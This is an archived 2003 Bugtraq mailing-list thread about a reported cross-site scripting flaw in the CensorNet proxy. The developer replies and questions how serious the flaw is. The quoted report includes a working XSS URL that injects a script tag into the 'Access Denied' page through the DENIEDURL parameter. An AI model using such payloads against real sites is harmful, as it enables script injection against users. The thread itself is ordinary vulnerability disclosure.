lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Mon, 27 Oct 2003 09:18:58 -0000
From: "Dan Searle" <dan.searle@...lix.com>
To: "Richard Maudsley" <maudr001@...m.org>,
	"David Wright" <wrigd006@...m.org>
Cc: <bugtraq@...urityfocus.com>, <frenw001@...m.org>
Subject: Re: CensorNet: Cross Site Scripting Vulnerability


Hi People,

I'm Dan the main developer for CensorNet. I don't consider this issue to be
a vulnerability of any kind, however, we will endeavour (for completeness)
to stop people from being able to insert script into the "Access Denied"
page on CensorNet. If anyone could enlighten me as to a situation where this
"vulnerability" would actually become dangerous in a practical situation
then please feel free.

Regards, Dan...

----- Original Message ----- 
From: "David Wright" <wrigd006@...m.org>
To: "Richard Maudsley" <maudr001@...m.org>
Cc: <bugtraq@...urityfocus.com>; <support@...lix.com>; <frenw001@...m.org>
Sent: Saturday, October 25, 2003 4:47 PM
Subject: Re: CensorNet: Cross Site Scripting Vulnerability


> Richard.
>
> Sorry i havent replied. I have been ill towards the end of the week.
>
> If you get a response from Adelix (they have taken over Intrago) can you
> let us know.
>
> Regards
>
> Dave
> "Richard Maudsley" <maudr001@...m.org> writes:
> >Hello,
> >
> >A cross site scripting vulnerability exists in the CensorNet Proxy
Service
> >(www.censornet.com) that allows scripting (and html) to be passed to the
> >cgi script and displayed in the web browser.
> >
> >Exploit:
>
>http://SERVER/cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Counter-
Strike__servers__from__£10_per_month!');window.open("http://www.socketx.co.u
k")</script>
> >
> >Regards,
> > Richard Maudsley
>
>
> David Wright
>
> Royal Borough of Windsor and Maidenhead
> -WAMIE (FirstClass) Technical Support Co-ordinator
>
> The Windsor Boys' School
> -SIMS Manager
>
> 1 Maidenhead Road, Windsor, Berkshire, SL4 5EH
>
> E-Mail: wrigd006@...m.org
> Work: 01753 716083
> Fax: 01753 833186
> Mobile:
>
>
> - -------------------------------------------------------------------
>     This email has been sent from the Royal Borough of Windsor and
Maidenhead LEA system, if you have cause for complaint regarding the
>        content of this email please contact abuse@...m.org
> - -------------------------------------------------------------------
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ